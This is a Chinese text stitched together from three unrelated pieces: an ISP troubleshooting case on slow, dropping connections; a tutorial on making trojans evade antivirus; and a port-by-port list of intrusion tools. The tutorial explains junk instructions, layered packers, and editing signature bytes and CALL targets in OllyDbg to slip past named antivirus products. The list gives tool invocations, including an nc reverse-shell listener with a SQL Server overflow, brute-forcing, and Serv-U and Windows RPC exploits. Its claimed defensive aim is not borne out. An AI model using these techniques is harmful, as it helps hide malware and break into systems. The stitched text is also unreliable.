案例分析：尊敬的用户，这只是误会。导致网速慢和经常掉线，通常情况下有几种可能的原因：第一、计算机感染病毒较严重；第二：计算机软硬件配置及性能；第三、上网终端质量、网线质量、线路传输负载；第四、线路接触是否良好、电源电压是否稳定等问题；第五、外界信号干扰、信号衰减、线路衰耗及线路距离长短；第六、私自或不规范组网；第七，网卡质量不好或没有插好；第八、安装了多种杀毒软件及防火墙或同时运行过多的程序；第九、通信协议设置和防火墙的配置等等原因；对于本案例中，该用户的情况经查明，该用户网速慢和掉线的原因是：第一、该用户的电脑感染了多种病毒，导致内存被占用，CPU使用率较高，经常达100%；影响了电脑性能，导致网速慢；第二、该用户办理的是ADSL拨号上网，因不规范的私自组网，导致线路传输负载加重，影响线路传输流量，造成网速慢并且经常掉线。第三、网线RJ45与HUB的接头接触不良好和电源电压不稳。

对于花指令:好多朋友都在满世界的找一些所谓的免杀的花指令.可是你在网上找到的都是一些以经公开了的.早就被杀了.就算暂时不杀.但是他的免杀期并不是由你来控制的.因为你也不知道哪一天会被杀软追杀.其实花指令在木马免杀中的作用就是干扰其正常的查杀顺序,对于一个木马来说如果是单一特征码的话,你加了花指令还杀的话.我想杀的也是花指令中的一处代码.那你完全可以在定位这个木马.查看是不是特征码以经在花指令上边了..(一般情况下都是这样的)如果在的话那就太好改了.因为花指令本身就是废话指令.无外呼就是来回的跳转.来回的压入,弹出.捎微掌握点汇编知识就能搞定了.
对于国产的杀软好多都是你把木马文件的头部转移了,就可以免杀了!!
对于加壳.因为有些壳加了木马就不能用了.有些呢..因为大家都用.所以也以经被杀了.可是杀也是杀他的壳..
对于卡吧.NOD32.诺顿等一些比教强的杀毒软件他强处之一就是他有很强的脱壳能力,就是他可以先把你的壳脱掉在来查杀木马.所以我要是给木马加壳的话就是找一些新壳,然后先加一道壳.在载入freeRES中释放资源.然后在加一道.不行就用同样的方法,在叫一道..但是就这样也不一定能过了杀毒.
好用的壳北斗.小辉的PE加密..
更改特征码:我认为做免杀的正道还是更改特征码免杀,木马的特征码都该完了后在找两个好壳加上.那你在看看免杀长不长吧.
在做定位免杀时也不能只更改你定位出来的那个特征码.你要看程序的整体汇编含意是什么,
比如:你定位的特征码在
卡吧 [特征] 0000B585_00000003 转内存地址: 0040B585
OD载入找到卡吧特征码的位置是
0040B57C |. E8 7F89FFFF CALL 木马.00403F00
0040B581 |. 8BD0 MOV EDX,EAX
0040B583 |. B9 08BC4000 MOV ECX,木马.0040BC08 ; ASCII ”KpopMon”
0040B588 |. B8 02000080 MOV EAX,80000002
也就是说0040B585是0040B583指令中的一部份.(这个要是不明白我就没话可说了)
那你就看0040B583 处的指令是什么意思..
是把0040BC08处的ASCII ”KpopMon”传送到寄存器ECX里.那这段你要是改的话就要到0040BC08地址处去调整他的位置.然后在回来把0040B583的指针调整就可以了.
还可以怎么改.在看0040B57C |. E8 7F89FFFF CALL 木马.00403F00
实际上现在的杀毒公司定位的特征码大部分都在CALL和JMP..上边
CALL是过程调用指令
那刚才那段OD中的指令你往上看还可以看到
0040B57C |. E8 7F89FFFF CALL 木马.00403F00
这句就是0040B57C调用00403F00中的指令.
其中CALL 木马.00403F00的位置查看00403F00的位置是
00403EFF 90 NOP
00403F00 /$ 85C0 TEST EAX,EAX
00403F02 |. 74 02 JE SHORT kk_.00403F06
00403F04 |. C3 RETN
00403F05 | 00 DB 00
00403F00上面是NOP.那你就可以把
0040B57C |. E8 7F89FFFF CALL 木马.00403F00的指针调整为
0040B57C |. E8 7F89FFFF CALL 木马.00403EFF
这样也能免杀.而且还没有改变堆栈平衡..其他的功能也决对不会有什么变化
       所以做免杀一定要掌握的就是汇编指令的含意.这个很简单并不是要你去完全的学会汇编的 

工欲善其事，必先利其器，本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法，希望能对大家有所帮助，以助于大家能更好地防御黑客的攻击。 
　　1. 1433端口入侵 
　　scanport.exe 查有1433的机器 
　　SQLScanPass.exe 进行字典暴破（字典是关键） 
　　最后 SQLTools.exe入侵 
　　============================= 
　　对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 
　　nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 
　　（以上反向的，测试成功） 
　　sqlhelloz.exe 入侵ip 1433 （这个是正向连接） 
　　 
　　2. 4899端口入侵 
　　用4899过滤器.exe，扫描空口令的机器 　　 
　　3. 3899的入侵 
　　对很早的机器，可以试试3389的溢出(win3389ex.exe) 
　　对2000的机器，可以试试字典暴破。(tscrack.exe) 
　　 
　　4. 80入侵 
　　对sp3以前的机器，可以用webdav入侵； 
　　对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe） 
　　可以利用SQL进行注入。（小榕的注入软件）。 
　　5. serv-u入侵(21端口） 
　　对5. 004及以下系统，可用溢出入侵。（serv5004.exe） 
　　对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe） 
　　====================================== 
　　对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs） 
　　输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 
　　 
　　6. 554端口 
　　用real554.exe入侵。 
　　 
　　7. 6129端口 
　　用DameWare6129.exe入侵。 
　　8. 系统漏洞 
　　利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞， 
　　进行溢出入侵。 
　　9. 3127等端口 
　　可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。 
　　10. 其他入侵 
　　利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。